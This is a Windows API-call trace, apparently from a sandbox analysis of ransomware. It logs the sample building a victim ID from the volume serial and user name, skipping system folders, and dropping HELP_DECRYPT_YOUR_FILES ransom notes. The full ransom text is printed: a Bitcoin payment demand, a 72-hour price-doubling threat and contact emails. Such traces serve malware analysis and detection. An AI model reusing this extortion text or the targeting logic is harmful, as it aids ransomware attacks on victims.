	[0166.722] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1889e8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1889e8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0166.723] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0166.723] GetUserNameA (in: lpBuffer=0x1888cc, pcbBuffer=0x1889e4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1889e4) returned 1
	[0166.724] wsprintfW (in: param_1=0x189868, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0166.725] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\crypto\\dss\\machinekeys\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0166.725] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0166.725] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0166.725] WriteFile (in: hFile=0x390, lpBuffer=0x189868*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x189944, lpOverlapped=0x0 | out: lpBuffer=0x189868*, lpNumberOfBytesWritten=0x189944*=0x30, lpOverlapped=0x0) returned 1
	[0166.725] CloseHandle (hObject=0x390) returned 1
	[0166.726] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0166.726] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0166.726] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0166.726] wsprintfW (in: param_1=0x189620, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys\\HELP_DECRYPT_YOUR_FILES.HTML") returned 80
	[0166.726] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\crypto\\dss\\machinekeys\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0166.727] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0166.727] WriteFile (in: hFile=0x390, lpBuffer=0x188e14*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x189938, lpOverlapped=0x0 | out: lpBuffer=0x188e14*, lpNumberOfBytesWritten=0x189938*=0x808, lpOverlapped=0x0) returned 1
	[0166.730] CloseHandle (hObject=0x390) returned 1
	[0166.731] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0166.731] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x188dfc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x188dfc*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0166.731] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0166.732] GetUserNameA (in: lpBuffer=0x188ce0, pcbBuffer=0x188df8 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x188df8) returned 1
	[0166.733] wsprintfA (in: param_1=0x189828, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0166.733] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\crypto\\dss\\machinekeys\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0166.733] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0166.733] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0166.733] WriteFile (in: hFile=0x390, lpBuffer=0x189828*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x189940, lpOverlapped=0x0 | out: lpBuffer=0x189828*, lpNumberOfBytesWritten=0x189940*=0x43, lpOverlapped=0x0) returned 1
	[0166.736] CloseHandle (hObject=0x390) returned 1
	[0166.736] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys\\*.*" (normalized: "c:\\users\\all users\\microsoft\\crypto\\dss\\machinekeys\\*.*"), lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x7ce8105d, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0166.736] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys\\*.*") returned 55
	[0166.737] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0166.737] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys\\*.*", cchLength=0x37 | out: lpsz="c:\\users\\all users\\microsoft\\crypto\\dss\\machinekeys\\*.*") returned 0x37
	[0166.737] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.737] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\machinekeys\\*.*", lpSrch="windows") returned 0x0
	[0166.737] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.737] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\machinekeys\\*.*", lpSrch="boot") returned 0x0
	[0166.737] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.738] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\machinekeys\\*.*", lpSrch="system volume information") returned 0x0
	[0166.738] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.738] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\machinekeys\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0166.738] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.738] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\machinekeys\\*.*", lpSrch="temp") returned 0x0
	[0166.738] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.738] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\machinekeys\\*.*", lpSrch="program files") returned 0x0
	[0166.739] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.739] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\machinekeys\\*.*", lpSrch="program files (x86)") returned 0x0
	[0166.739] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.739] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\machinekeys\\*.*", lpSrch="appdata") returned 0x0
	[0166.739] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.739] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\machinekeys\\*.*", lpSrch="application data") returned 0x0
	[0166.739] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.740] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\machinekeys\\*.*", lpSrch="winnt") returned 0x0
	[0166.740] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.740] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\machinekeys\\*.*", lpSrch="tmp") returned 0x0
	[0166.740] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.740] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\machinekeys\\*.*", lpSrch="cache") returned 0x0
	[0166.740] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.740] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\machinekeys\\*.*", lpSrch="temporary internet files") returned 0x0
	[0166.740] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.741] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\machinekeys\\*.*", lpSrch="webcache") returned 0x0
	[0166.741] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.741] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\machinekeys\\*.*", lpSrch="inetcache") returned 0x0
	[0166.741] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.741] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\machinekeys\\*.*", lpSrch="nvidia") returned 0x0
	[0166.741] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.741] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\machinekeys\\*.*", lpSrch="packages") returned 0x0
	[0166.742] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.742] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\machinekeys\\*.*", lpSrch="cookies") returned 0x0
	[0166.742] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.742] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\machinekeys\\*.*", lpSrch="programdata") returned 0x0
	[0166.742] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0166.742] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0166.742] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x7ce8105d, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0166.743] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0166.743] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ce8105d, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7ce8105d, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7cea74ff, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0166.743] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ce5b127, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7ce5b127, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7ce8105d, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0166.743] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ce5b127, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7ce5b127, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7ce8105d, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0
	[0166.743] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0166.743] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0166.744] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MachineKeys", cAlternateFileName="MACHIN~1")) returned 0
	[0166.744] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0166.744] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0166.744] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cd9c2c1, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7cd9c2c1, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7cdc2771, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0166.744] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cd767d1, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7cd767d1, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7cd9c2c1, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0166.744] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Keys", cAlternateFileName="")) returned 1
	[0166.744] lstrcmpW (lpString1="Keys", lpString2="..") returned 1
	[0166.745] lstrcmpW (lpString1="Keys", lpString2=".") returned 1
	[0166.745] lstrcpyW (in: lpString1=0x18b58c, lpString2="C:\\Users\\All Users\\Microsoft\\Crypto" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto") returned="C:\\Users\\All Users\\Microsoft\\Crypto"
	[0166.745] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\"
	[0166.745] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\", lpString2="Keys" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\Keys") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\Keys"
	[0166.745] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\Crypto\\Keys" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\Keys") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\Keys"
	[0166.745] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\Keys", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\Keys\\") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\Keys\\"
	[0166.745] lstrcpyW (in: lpString1=0x18a674, lpString2="C:\\Users\\All Users\\Microsoft\\Crypto\\Keys\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\Keys\\") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\Keys\\"
	[0166.745] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\Keys\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\Keys\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\Keys\\*.*"
	[0166.746] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\Keys\\*.*" (normalized: "c:\\users\\all users\\microsoft\\crypto\\keys\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0166.746] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Crypto\\Keys\\*.*") returned 44
	[0166.746] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0166.746] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Crypto\\Keys\\*.*", cchLength=0x2c | out: lpsz="c:\\users\\all users\\microsoft\\crypto\\keys\\*.*") returned 0x2c
	[0166.746] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.747] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\keys\\*.*", lpSrch="windows") returned 0x0
	[0166.747] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.747] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\keys\\*.*", lpSrch="boot") returned 0x0
	[0166.747] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.747] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\keys\\*.*", lpSrch="system volume information") returned 0x0
	[0166.747] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.747] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\keys\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0166.748] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.748] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\keys\\*.*", lpSrch="temp") returned 0x0
	[0166.748] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.748] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\keys\\*.*", lpSrch="program files") returned 0x0
	[0166.748] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.748] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\keys\\*.*", lpSrch="program files (x86)") returned 0x0
	[0166.748] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.749] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\keys\\*.*", lpSrch="appdata") returned 0x0
	[0166.749] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.749] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\keys\\*.*", lpSrch="application data") returned 0x0
	[0166.749] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.749] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\keys\\*.*", lpSrch="winnt") returned 0x0
	[0166.749] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.749] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\keys\\*.*", lpSrch="tmp") returned 0x0
	[0166.749] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.761] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\keys\\*.*", lpSrch="cache") returned 0x0
	[0166.761] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.761] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\keys\\*.*", lpSrch="temporary internet files") returned 0x0
	[0166.762] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.762] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\keys\\*.*", lpSrch="webcache") returned 0x0
	[0166.762] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.762] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\keys\\*.*", lpSrch="inetcache") returned 0x0
	[0166.762] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.762] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\keys\\*.*", lpSrch="nvidia") returned 0x0
	[0166.762] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.762] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\keys\\*.*", lpSrch="packages") returned 0x0
	[0166.763] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.763] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\keys\\*.*", lpSrch="cookies") returned 0x0
	[0166.763] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.763] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\keys\\*.*", lpSrch="programdata") returned 0x0
	[0166.763] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0166.763] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0
	[0166.763] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0166.763] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0166.764] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\Crypto\\Keys" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\Keys") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\Keys"
	[0166.764] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\Keys", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\Keys\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\Keys\\*.*"
	[0166.764] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0166.764] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0166.764] wsprintfW (in: param_1=0x18a370, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Crypto\\Keys\\HELP_DECRYPT_YOUR_FILES.TXT") returned 68
	[0166.765] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\Keys\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\crypto\\keys\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0166.766] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you 